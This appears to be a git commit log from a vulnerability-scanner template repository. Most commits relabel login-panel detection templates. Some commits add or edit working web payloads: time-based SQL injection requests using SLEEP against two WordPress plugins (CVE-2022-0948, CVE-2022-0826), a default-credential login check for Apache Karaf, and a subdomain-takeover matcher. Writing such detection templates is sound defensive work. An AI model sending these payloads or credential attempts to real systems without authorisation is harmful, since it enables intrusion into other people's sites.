2022/12/01 diff --git a/exposed-panels/omniampx-panel.yaml b/exposed-panels/omniampx-panel.yaml index eb62a1fd54..4e1755d3b6 100644 --- a/exposed-panels/omniampx-panel.yaml +++ b/exposed-panels/omniampx-panel.yaml @@ -1,9 +1,14 @@ id: omniampx-panel info: - name: Omnia Node MPX - Panel + name: Omnia MPX Node Login Panel - Detect author: arafatansari severity: info + description: Omnia MPX Node login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"Omnia MPX" @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/open-game-panel.yaml b/exposed-panels/open-game-panel.yaml index 3b16acaf75..73dcdf22ea 100644 --- a/exposed-panels/open-game-panel.yaml +++ b/exposed-panels/open-game-panel.yaml @@ -1,11 +1,16 @@ id: open-game-panel info: - name: Open Game Panel + name: Open Game Panel Login Panel - Detect author: dhiyaneshDk severity: info + description: Open Game Panel login panel was detected. reference: - https://www.exploit-db.com/ghdb/7418 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Open Game Panel" tags: panel,edb @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/open-stack-dashboard-login.yaml b/exposed-panels/open-stack-dashboard-login.yaml index debafaf4a9..1d2d4e0e13 100644 --- a/exposed-panels/open-stack-dashboard-login.yaml +++ b/exposed-panels/open-stack-dashboard-login.yaml @@ -1,11 +1,16 @@ id: open-stack-dashboard-login info: - name: OpenStack Dashboard + name: OpenStack Dashboard Login Panel - Detect author: dhiyaneshDK,hackergautam severity: info + description: OpenStack Dashboard login panel was detected. reference: - https://www.exploit-db.com/ghdb/6464 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,openstack,edb requests: @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/openam-panel.yaml b/exposed-panels/openam-panel.yaml index 683499d672..9d5b7d48c5 100644 --- a/exposed-panels/openam-panel.yaml +++ b/exposed-panels/openam-panel.yaml @@ -1,9 +1,14 @@ id: openam-panel info: - name: OpenAM and OpenSSO Login Panel + name: OpenAM Login Panel - Detect author: philippedelteil severity: info + description: OpenAM login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"OpenAM" tags: panel,openam,opensso,login @@ -39,7 +44,7 @@ requests: matchers: - type: word words: - - 'urlArgs : "v=' + - 'urlArgs: "v=' - 'Sign in to OpenAM' - 'ForgeRock' - 'forgerock' @@ -56,4 +61,6 @@ requests: part: body group: 1 regex: - - 'urlArgs : "v=([0-9.abcd]+)' + - 'urlArgs: "v=([0-9.abcd]+)' + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/opencats-panel.yaml b/exposed-panels/opencats-panel.yaml index 76f53cf8d7..9fbeae6a07 100644 --- a/exposed-panels/opencats-panel.yaml +++ b/exposed-panels/opencats-panel.yaml @@ -1,9 +1,14 @@ id: opencats-panel info: - name: OpenCATS Login Panel + name: OpenCATS Login Panel - Detect author: arafatansari severity: info + description: OpenCATS login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"opencats" @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/openemr-detect.yaml b/exposed-panels/openemr-detect.yaml index 5eeb4a5fd2..75f37edd15 100644 --- a/exposed-panels/openemr-detect.yaml +++ b/exposed-panels/openemr-detect.yaml @@ -1,9 +1,14 @@ id: openemr-detect info: - name: OpenEMR Product Detect + name: OpenEMR Product Registration Panel - Detect author: pussycat0x severity: info + description: OpenEMR Product Registration panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: fofa-query: app="OpenEMR" shodan-query: http.html:"OpenEMR" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/openerp-database.yaml b/exposed-panels/openerp-database.yaml index 7d9f2c6a84..bf027986e1 100644 --- a/exposed-panels/openerp-database.yaml +++ b/exposed-panels/openerp-database.yaml @@ -1,9 +1,14 @@ id: openerp-database info: - name: OpenERP database instances + name: Odoo OpenERP Database Selector Panel - Detect author: impramodsargar severity: info + description: Odoo OpenERP database selector panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: openerp,panel requests: @@ -19,4 +24,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/openfire-admin-panel.yaml b/exposed-panels/openfire-admin-panel.yaml index 1e98b513d7..394c9122aa 100644 --- a/exposed-panels/openfire-admin-panel.yaml +++ b/exposed-panels/openfire-admin-panel.yaml @@ -1,9 +1,14 @@ id: openfire-admin-panel info: - name: Openfire Admin Console + name: Openfire Admin Console Login Panel - Detect author: theamanrawat severity: info + description: Openfire Admin Console login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"Openfire Admin Console" @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/01 diff --git a/exposed-panels/opennebula-panel.yaml b/exposed-panels/opennebula-panel.yaml index 0664407e52..44f9c4a35c 100644 --- a/exposed-panels/opennebula-panel.yaml +++ b/exposed-panels/opennebula-panel.yaml @@ -1,14 +1,18 @@ id: opennebula-panel info: - name: OpenNebula Panel Detect + name: OpenNebula Login Panel - Detect author: kh4sh3i severity: info description: | - OpenNebula is an Open Source Cloud Computing Platform to build and manage Enterprise Clouds + OpenNebula login panel was detected. reference: - https://opennebula.io/ - https://github.com/OpenNebula + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"opennebula" @@ -30,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/02 diff --git a/exposed-panels/opennms-web-console.yaml b/exposed-panels/opennms-web-console.yaml index ac308ba02b..f9f5cfceb2 100644 --- a/exposed-panels/opennms-web-console.yaml +++ b/exposed-panels/opennms-web-console.yaml @@ -1,11 +1,16 @@ id: opennms-web-console info: - name: OpenNMS web console + name: OpenNMS Web Console Login Panel - Detect author: DhiyaneshDk severity: info + description: OpenNMS Web Console login panel was detected. reference: - https://www.exploit-db.com/ghdb/5468 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,login,edb requests: @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/02 diff --git a/exposed-panels/openshift-installer-panel.yaml b/exposed-panels/openshift-installer-panel.yaml index 0017de6ddd..63abc900d5 100644 --- a/exposed-panels/openshift-installer-panel.yaml +++ b/exposed-panels/openshift-installer-panel.yaml @@ -1,9 +1,14 @@ id: openshift-installer-panel info: - name: OpenShift Assisted Installer + name: OpenShift Assisted Installer Panel - Detect author: DhiyaneshDk severity: high + description: OpenShift Assisted Installer panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"OpenShift Assisted Installer" @@ -29,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/02 diff --git a/exposed-panels/opensis-panel.yaml b/exposed-panels/opensis-panel.yaml index ef7852207b..bb85267956 100644 --- a/exposed-panels/opensis-panel.yaml +++ b/exposed-panels/opensis-panel.yaml @@ -1,9 +1,14 @@ id: opensis-detect info: - name: OpenSIS Login Panel + name: OpenSIS Login Panel - Detect author: pikpikcu severity: info + description: OpenSIS login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"openSIS" tags: panel,opensis,login @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/02 diff --git a/exposed-panels/openvpn-admin.yaml b/exposed-panels/openvpn-admin.yaml index 586435b181..473dff50c9 100644 --- a/exposed-panels/openvpn-admin.yaml +++ b/exposed-panels/openvpn-admin.yaml @@ -1,9 +1,14 @@ id: openvpn-admin info: - name: OpenVPN Admin Panel + name: OpenVPN Admin Login Panel - Detect author: ritikchaddha severity: info + description: OpenVPN Admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"OpenVPN-Admin" @@ -29,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/02 diff --git a/exposed-panels/openvpn-connect.yaml b/exposed-panels/openvpn-connect.yaml index 1a21b06c98..ff2e200786 100644 --- a/exposed-panels/openvpn-connect.yaml +++ b/exposed-panels/openvpn-connect.yaml @@ -1,9 +1,14 @@ id: openvpn-connect info: - name: OpenVPN Connect Panel + name: OpenVPN Connect Panel - Detect author: ritikchaddha severity: info + description: OpenVPN Connect panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"openvpn connect" @@ -23,3 +28,5 @@ requests: - 'content="OpenVPN Connect' - 'OpenVPN Connect' condition: or + +# Enhanced by md on 2022/12/02 diff --git a/exposed-panels/openvpn-router-management.yaml b/exposed-panels/openvpn-router-management.yaml index 7877cbc9fd..bcee3c088a 100644 --- a/exposed-panels/openvpn-router-management.yaml +++ b/exposed-panels/openvpn-router-management.yaml @@ -1,9 +1,14 @@ id: openvpn-router-management info: - name: OpenVPN Server Router Management + name: OpenVPN Server Router Management Panel - Detect author: ritikchaddha severity: low + description: OpenVPN Server Router Management Panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"Router Management - Server OpenVPN" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/02 diff --git a/exposed-panels/openvz-web-login.yaml b/exposed-panels/openvz-web-login.yaml index e36397b63c..4244b3329b 100644 --- a/exposed-panels/openvz-web-login.yaml +++ b/exposed-panels/openvz-web-login.yaml @@ -1,13 +1,17 @@ id: openvz-web-login info: - name: Openvz Web Panel Login + name: OpenVZ Web Panel Login Panel - Detect author: nullfuzz severity: info description: | - OpenVZ Web Panel is a GUI web-based frontend for controlling of the physical and virtual servers with the OpenVZ virtualization technology. + OpenVZ Web Panel login panel was detected. reference: - https://github.com/sibprogrammer/owp + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.favicon.hash:-1898583197 @@ -24,3 +28,5 @@ requests: - 'status_code == 200' - 'contains(body, "Login - OpenVZ Web Panel")' condition: and + +# Enhanced by md on 2022/12/02 diff --git a/exposed-panels/openx-panel.yaml b/exposed-panels/openx-panel.yaml index fffe13bdc0..7452fd803c 100644 --- a/exposed-panels/openx-panel.yaml +++ b/exposed-panels/openx-panel.yaml @@ -1,9 +1,14 @@ id: openx-panel info: - name: OpenX Login Panel + name: OpenX Login Panel - Detect author: pikpikcu severity: info + description: OpenX login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"OpenX" tags: panel,openx,login @@ -32,3 +37,5 @@ requests: group: 1 regex: - '(.*)- http://www.openx.org' + +# Enhanced by md on 2022/12/02 diff --git a/exposed-panels/oracle-business-control.yaml b/exposed-panels/oracle-business-control.yaml index e304203f12..cded528d5d 100644 --- a/exposed-panels/oracle-business-control.yaml +++ b/exposed-panels/oracle-business-control.yaml @@ -1,9 +1,14 @@ id: oracle-business-control info: - name: Oracle Commerce Business Control Center + name: Oracle Commerce Business Control Center Login Panel - Detect author: dhiyaneshDk severity: info + description: Oracle Commerce Business Control Center login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Oracle Commerce" tags: oracle,login,panel @@ -22,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/02 diff --git a/exposed-panels/oracle-business-intelligence.yaml b/exposed-panels/oracle-business-intelligence.yaml index 3b8f2afd54..357dc32773 100644 --- a/exposed-panels/oracle-business-intelligence.yaml +++ b/exposed-panels/oracle-business-intelligence.yaml @@ -1,9 +1,14 @@ id: oracle-business-intelligence info: - name: Oracle Business Intelligence Sign In + name: Oracle Business Intelligence Login Panel - Detect author: DhiyaneshDk severity: info + description: Oracle Business Intelligence login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"Oracle Business Intelligence Sign In" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/02 diff --git a/exposed-panels/oracle-containers-panel.yaml b/exposed-panels/oracle-containers-panel.yaml index f1b41169bb..08c8f15554 100644 --- a/exposed-panels/oracle-containers-panel.yaml +++ b/exposed-panels/oracle-containers-panel.yaml @@ -1,9 +1,14 @@ id: oracle-containers-panel info: - name: Oracle Containers for J2EE 10g Panel + name: Oracle Containers for J2EE 10g Panel - Detect author: dogasantos severity: info + description: Oracle Containers for J2EE 10g panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,oracle,containers requests: @@ -28,3 +33,5 @@ requests: group: 1 regex: - 'Oracle Containers for J2EE 10g \(.*\)' + +# Enhanced by md on 2022/12/02 diff --git a/exposed-panels/oracle-enterprise-manager-login.yaml b/exposed-panels/oracle-enterprise-manager-login.yaml index 951c5ad751..cd9358b22f 100644 --- a/exposed-panels/oracle-enterprise-manager-login.yaml +++ b/exposed-panels/oracle-enterprise-manager-login.yaml @@ -1,9 +1,14 @@ id: oracle-enterprise-manager-login info: - name: Oracle Enterprise Manager login + name: Oracle Enterprise Manager Login Panel - Detect author: dogasantos severity: info + description: Oracle Enterprise Manager login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,oracle,manager,login requests: @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/02 diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml index d3a7479cb7..737c8d0422 100644 --- a/exposed-panels/oracle-integrated-manager.yaml +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -1,9 +1,14 @@ id: oracle-integrated-manager info: - name: Oracle(R) Integrated Lights Out Manager + name: Oracle Integrated Lights Out Manager Login Panel - Detect author: dhiyaneshDk severity: info + description: Oracle Integrated Lights Out Manager login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Oracle(R) Integrated Lights Out Manager" tags: oracle,login,panel @@ -30,3 +35,5 @@ requests: group: 1 regex: - 'id="hostname">([a-z0-9-]+)<\/span><\/td>' + +# Enhanced by md on 2022/12/02 diff --git a/exposed-panels/oracle-people-enterprise.yaml b/exposed-panels/oracle-people-enterprise.yaml index 90f42929ea..106aa99cbb 100644 --- a/exposed-panels/oracle-people-enterprise.yaml +++ b/exposed-panels/oracle-people-enterprise.yaml @@ -1,9 +1,14 @@ id: oracle-people-enterprise info: - name: Oracle Peoplesoft Enterprise + name: Oracle PeopleSoft Enterprise Login Panel - Detect author: dhiyaneshDk severity: info + description: Oracle PeopleSoft Enterprise login panel detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Oracle Peoplesoft Enterprise" tags: oracle,login,panel @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/12/02 From 163ed83af57a6e1d29f5fb22f9ad01e1947eea6b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Dec 2022 21:40:16 +0000 Subject: [PATCH 0898/1415] Auto Generated CVE annotations [Fri Dec 2 21:40:16 UTC 2022] :robot: --- cves/2008/CVE-2008-6982.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2008/CVE-2008-6982.yaml b/cves/2008/CVE-2008-6982.yaml index 1c42f706a1..bbec36dfbb 100644 --- a/cves/2008/CVE-2008-6982.yaml +++ b/cves/2008/CVE-2008-6982.yaml @@ -13,8 +13,8 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 - cwe-id: CWE-79 cve-id: CVE-2008-6982 + cwe-id: CWE-79 metadata: verified: "true" tags: cve,cve2008,devalcms,xss,cms,edb From b96a429f7b84c671ec785e780eac4f2131c80414 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 3 Dec 2022 07:57:44 +0000 Subject: [PATCH 0899/1415] Auto Generated New Template Addition List [Sat Dec 3 07:57:44 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e81ebc715c..6c443860c9 100644 --- a/.new-additions +++ b/.new-additions @@ -22,6 +22,7 @@ exposed-panels/locklizard-webviewer-panel.yaml exposed-panels/mach-proweb-login.yaml exposed-panels/mikrotik/mikrotik-routeros-old.yaml exposed-panels/nuxeo-platform-panel.yaml +exposed-panels/opencart-login.yaml exposed-panels/pega-web-panel.yaml exposed-panels/persis-panel.yaml exposed-panels/riseup-panel.yaml From 98faf639d8a5ef1dcb9007d73df9bafc180f7dcc Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sat, 3 Dec 2022 09:58:26 +0100 Subject: [PATCH 0900/1415] Update pega-web-panel.yaml --- exposed-panels/pega-web-panel.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-panels/pega-web-panel.yaml b/exposed-panels/pega-web-panel.yaml index 09397816e7..8a34f22be9 100644 --- a/exposed-panels/pega-web-panel.yaml +++ b/exposed-panels/pega-web-panel.yaml @@ -2,7 +2,7 @@ id: pega-web-panel info: name: Pega Infinity Web Login Panel - author: powerexploit + author: powerexploit,righettod severity: info description: | Pega Infinity is CRM solution with robotic automation that is fully baked in.Which supports no code platform with robotic automation @@ -18,6 +18,7 @@ requests: - method: GET path: - "{{BaseURL}}/prweb/PRAuth/app/default/" + - "{{BaseURL}}/prweb" host-redirects: true max-redirects: 2 From f0f87d7c9f009f3de397217bbd3d92362e477475 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Sat, 3 Dec 2022 16:34:00 +0530 Subject: [PATCH 0901/1415] Added template for CVE-2022-0948 --- cves/2022/CVE-2022-0948.yaml | 44 ++++++++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 cves/2022/CVE-2022-0948.yaml diff --git a/cves/2022/CVE-2022-0948.yaml b/cves/2022/CVE-2022-0948.yaml new file mode 100644 index 0000000000..a5199a57ff --- /dev/null +++ b/cves/2022/CVE-2022-0948.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-0948 + +info: + name: Order Listener for WooCommerce < 3.2.2 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection. + reference: + - https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576 + - https://wordpress.org/plugins/woc-order-alert/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0948 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0948 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,woc-order-alert,unauth + +requests: + - raw: + - | + GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout: 15s + POST /?rest_route=/olistener/new HTTP/1.1 + Host: {{Hostname}} + content-type: application/json + + {"id":" (SLEEP(6))#"} + + req-condition: true + matchers: + - type: dsl + dsl: + - 'duration_2>=6' + - 'status_code_2 == 200' + - 'contains(content_type_2, "application/json")' + - 'contains(body_1, "olistener-action.olistener-controller")' + condition: and \ No newline at end of file From 10159089acbe39f52233ab013306a695e07e247a Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Sat, 3 Dec 2022 16:37:30 +0530 Subject: [PATCH 0902/1415] Updated --- cves/2022/CVE-2022-0826.yaml | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-0826.yaml b/cves/2022/CVE-2022-0826.yaml index c5b96634bd..15f724ac96 100644 --- a/cves/2022/CVE-2022-0826.yaml +++ b/cves/2022/CVE-2022-0826.yaml @@ -24,12 +24,8 @@ requests: - | @timeout: 15s POST /wp-admin/admin-ajax.php HTTP/1.1 - Host: 192.168.0.100:8888 - User-Agent: curl/7.79.1 - Accept: */* - Content-Length: 132 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Connection: close action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523 matchers: From e42f613f5843e40ec42d1801b30fa252bbf2f435 Mon Sep 17 00:00:00 2001 From: Vladimir S <50343281+rivalsec@users.noreply.github.com> Date: Sat, 3 Dec 2022 18:57:17 +0500 Subject: [PATCH 0903/1415] Meteor cloud (galaxy) subdomain takeover (#6220) * Meteor cloud (galaxy) subdomain takeover * trailing spaces removed --- takeovers/meteor-takeover.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 takeovers/meteor-takeover.yaml diff --git a/takeovers/meteor-takeover.yaml b/takeovers/meteor-takeover.yaml new file mode 100644 index 0000000000..5f594c0471 --- /dev/null +++ b/takeovers/meteor-takeover.yaml @@ -0,0 +1,20 @@ +id: rivalsec-meteor-takeover + +info: + name: Meteor subdomain takeover + author: rivalsec + severity: high + reference: + - https://rivalsec.github.io/blog/2022/12/02/meteor.html + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/321 + tags: takeover,meteor + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - "404 Not Found: No applications registered for host '" From c6d6ba8c471d47686714d2fbceed39eec8cbb97b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 3 Dec 2022 13:57:37 +0000 Subject: [PATCH 0904/1415] Auto Generated New Template Addition List [Sat Dec 3 13:57:37 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6c443860c9..b963ada9b6 100644 --- a/.new-additions +++ b/.new-additions @@ -51,6 +51,7 @@ misconfiguration/unauth-etherpad.yaml network/detection/dropbear-cbc-ciphers.yaml network/misconfig/dropbear-weakalgo.yaml network/misconfig/dropbear-weakmac.yaml +takeovers/meteor-takeover.yaml technologies/aerocms-detect.yaml technologies/oracle-httpserver12c.yaml technologies/payara-micro-server-detect.yaml From 3ad8586df6726b80df8a0e35b9b54b0dc9788892 Mon Sep 17 00:00:00 2001 From: Thibault Soubiran Date: Sat, 3 Dec 2022 22:53:49 +0100 Subject: [PATCH 0905/1415] Add Apache Karaf templates --- .../apache/karaf-default-login.yaml | 38 +++++++++++++++++++ exposed-panels/apache/apache-karaf-panel.yaml | 26 +++++++++++++ 2 files changed, 64 insertions(+) create mode 100644 default-logins/apache/karaf-default-login.yaml create mode 100644 exposed-panels/apache/apache-karaf-panel.yaml diff --git a/default-logins/apache/karaf-default-login.yaml b/default-logins/apache/karaf-default-login.yaml new file mode 100644 index 0000000000..c8d2212aba --- /dev/null +++ b/default-logins/apache/karaf-default-login.yaml @@ -0,0 +1,38 @@ +id: karaf-default-login + +info: + name: Apache Karaf Default Login + author: s0obi + severity: high + description: Apache Karaf default login credentials were discovered. + reference: + - https://karaf.apache.org/manual/latest/webconsole + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cwe-id: CWE-1392 + remediation: Change default karaf password for a stronger one. + tags: apache,default-login,karaf + +requests: + - raw: + - | + GET /system/console HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64('karaf:karaf')}} + + redirects: true + max-redirects: 1 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Apache Karaf Web Console" + - "http://karaf.apache.org" + condition: and + + - type: status + status: + - 200 diff --git a/exposed-panels/apache/apache-karaf-panel.yaml b/exposed-panels/apache/apache-karaf-panel.yaml new file mode 100644 index 0000000000..9bdffb4115 --- /dev/null +++ b/exposed-panels/apache/apache-karaf-panel.yaml @@ -0,0 +1,26 @@ +id: apache-karaf-panel + +info: + name: Apache Karaf Login Panel + author: s0obi + severity: info + description: An Apache Karaf login panel was detected. + classification: + cwe-id: CWE-200 + tags: apache,karaf,panel + +requests: + - method: GET + path: + - "{{BaseURL}}:8181/system/console" + + matchers-condition: and + matchers: + - type: word + words: + - "Basic realm=\"karaf\"" + part: header + + - type: status + status: + - 401 From 00553bd4796975d8be70f434f0be700dec0d3705 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 4 Dec 2022 04:42:18 +0000 Subject: [PATCH 0907/1415] Auto Generated New Template Addition List [Sun Dec 4 04:42:17 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b963ada9b6..f4f456fda0 100644 --- a/.new-additions +++ b/.new-additions @@ -26,6 +26,7 @@ exposed-panels/opencart-login.yaml exposed-panels/pega-web-panel.yaml exposed-panels/persis-panel.yaml exposed-panels/riseup-panel.yaml +exposed-panels/superadmin-ui-panel.yaml exposed-panels/versa/versa-director-login.yaml exposed-panels/versa/versa-flexvnf-panel.yaml exposed-panels/vodafone-voxui-panel.yaml From 2c7c3a28fa1a2c45ec6c512991ab273521681787 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 4 Dec 2022 04:43:56 +0000 Subject: [PATCH 0908/1415] Auto Generated New Template Addition List [Sun Dec 4 04:43:56 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f4f456fda0..ccc358e5ef 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ exposed-panels/cudatel-panel.yaml exposed-panels/dradis-pro-panel.yaml exposed-panels/exolis-engage-panel.yaml exposed-panels/fastpanel-hosting-control-panel.yaml +exposed-panels/flahscookie-superadmin-panel.yaml exposed-panels/locklizard-webviewer-panel.yaml exposed-panels/mach-proweb-login.yaml exposed-panels/mikrotik/mikrotik-routeros-old.yaml From ded946d8ecd9b8dcf81e3b33d9f042bd0f327bbc Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 4 Dec 2022 04:46:42 +0000 Subject: [PATCH 0909/1415] Auto Generated New Template Addition List [Sun Dec 4 04:46:42 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ccc358e5ef..002ce569b0 100644 --- a/.new-additions +++ b/.new-additions @@ -15,6 +15,7 @@ exposed-panels/asus-router-panel.yaml exposed-panels/backpack/backpack-admin-panel.yaml exposed-panels/cisco/cisco-webvpn-detect.yaml exposed-panels/cudatel-panel.yaml +exposed-panels/dqs-superadmin-panel.yaml exposed-panels/dradis-pro-panel.yaml exposed-panels/exolis-engage-panel.yaml exposed-panels/fastpanel-hosting-control-panel.yaml From 9b3a393faa01c5fa45eecafcac16cb3e81208a25 Mon Sep 17 00:00:00 2001 